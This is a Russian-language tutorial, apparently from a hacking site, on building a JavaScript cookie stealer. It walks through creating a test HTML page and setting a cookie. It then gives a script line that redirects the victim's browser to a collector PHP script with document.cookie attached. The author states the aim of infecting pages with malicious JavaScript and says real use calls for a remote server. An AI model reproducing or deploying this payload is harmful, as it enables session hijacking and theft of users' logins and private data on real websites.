Делаем Cookie-стиллер
INHIDE![](/file/98c632360b54c8e2dfbb6.jpg)
JavaScript – один из самых распространенных языков, используемых в веб-программировании. Он скрывает в себе множество полезных возможностей для работы с сайтами, хотя некоторые их них не столь однозначны (например, сборщик куки, который мы будем использовать в этой статье).
Куки (cookies) – данные, запрашиваемые веб-сайтом в целях “запоминания” пользователя. Содержат в себе: время посещения сайта, устройство подключения, логины, пароли и прочую деликатную информацию – чтобы их заполучить, мы попробуем заразить исходный html-код страницы вредоносным javascript.
#Создание тестовой HTML страницы
Для начала, создадим новую директорию, где будет ютиться наш html-файл:
mkdir cookiestealer
И переместимся в неё командой
cd cookiestealer
Оказавшись в директории, создадим файл "index.html" командой
touch index.html
![](/file/3cd94ab173102db6901fc.png)
Далее займемся его наполнением
nano index.html
Добавьте стандартные html-теги в документ:
<html> <body> </body> </html>
Получится что-то вроде этого
![](/file/4b2b3f1b0f581dfd0ab09.png)
Теперь сохраняйте документ сочетанием клавиш Ctrl+O. Если мы откроем этот файл в нашем браузере, увидим пустую страницу (это логично).
![](/file/6b3d6cba3e3c7b7302bab.png)
#Создание cookies
Мы можем самостоятельно создать cookies добавив одну лишь строчку в нашу тестовую html-страницу:
<script type="text/javascript"> document.cookie = "username=Null Byte"; </script>
В редакторе впишите эту строку между тегами “body” как указано на скриншоте:
![](/file/721f9857468cc316d4692.png)
Если Вы откроете веб-страницу еще раз после сохранения, внешне ничего не изменится, но “под капотом” уже появились наши cookies. Чтобы их посмотреть добавим в наш javascript команду вывода:
document.write(document.cookie);
Наш скрипт теперь выглядит вот так:
![](/file/2aceb37bdcb32d0129c0d.png)
Еще раз сохраните и откройте через браузер – теперь Вы видите наши самодельные cookies.
![](/file/88d06d3bcbae599f25c23.png)
Не забудьте потом стереть команду “document.write(document.cookie);” из файла – мы же не хотим показывать cookie в дальнейшем.
#Воруем cookies при помощи JavaScript
Используя JavaScript, перенаправим вывод куки на сервер для дальнейшего использования командой:
document.location='http://127.0.0.1 /cookiestealer.php?c='+document.cookie;
В примере я использую локальный адрес 127.0.0.1 – в настоящей работе Вы должны использовать адрес файла, расположенного на удаленном сервере.
Теперь Ваш html-файл должен выглядеть примерно вот так:
![](/file/aea721f038556b4457908.png)
Этого вполне достаточно, чтобы перенаправить cookies в необходимое нам место.